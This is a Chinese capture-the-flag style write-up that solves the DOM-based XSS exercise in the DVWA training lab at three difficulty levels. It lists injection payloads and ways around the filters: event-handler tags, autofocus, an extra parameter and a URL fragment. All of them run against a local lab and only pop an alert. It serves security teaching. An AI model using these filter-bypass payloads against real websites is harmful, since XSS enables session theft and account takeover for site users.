【dvwa靶场:XSS系列】XSS (DOM) 低-中-高级别,通关啦

一、低级low

拼接的url样式:​​​​​​​

http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

复制代码
<script>alert("假客套")</script>

二、中级middle

拼接的url样式:​​​​​​​
http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default= 拼接的新内容

过滤了script,使用其他标签拼接新的,新的拼接如下四选一

复制代码
</select><svg onload=alert('假客套');>

</select><img src=x onerror=alert("假客套")>

注意这里的autofocus会一直自动加载弹窗,不加无效

复制代码
<select><input onfocus = alert('假客套') autofocus/>

"><input onfocus = alert('假客套') autofocus/>

三、高级high

拼接的url样式:

​​​​​​​http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=English 拼接的新内容

过滤了script,使用其他标签拼接新的,新的拼接如下二选一

自定义一个参数名,拼接假的采纳数传递过去,比如不存在的name

复制代码
&name=<script>alert("假客套")</script>

# 注释掉后续不传给后端,也不过滤

复制代码
#<script>alert("假客套")</script>
相关推荐
独行soc6 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Whoisshutiao8 小时前
网安-XSS-pikachu
前端·安全·网络安全
游戏开发爱好者81 天前
iOS重构期调试实战:架构升级中的性能与数据保障策略
websocket·网络协议·tcp/ip·http·网络安全·https·udp
安全系统学习1 天前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
A5rZ1 天前
Puppeteer 相关漏洞-- Google 2025 Sourceless
网络安全
Bruce_Liuxiaowei1 天前
常见高危端口风险分析与防护指南
网络·网络安全·端口·信息搜集
2501_916013741 天前
iOS 多线程导致接口乱序?抓包还原 + 请求调度优化实战
websocket·网络协议·tcp/ip·http·网络安全·https·udp
头发那是一根不剩了1 天前
双因子认证(2FA)是什么?从零设计一个安全的双因子登录接口
网络安全·系统设计·身份认证
浩浩测试一下2 天前
渗透信息收集- Web应用漏洞与指纹信息收集以及情报收集
android·前端·安全·web安全·网络安全·安全架构
Gappsong8742 天前
【Linux学习】Linux安装并配置Redis
java·linux·运维·网络安全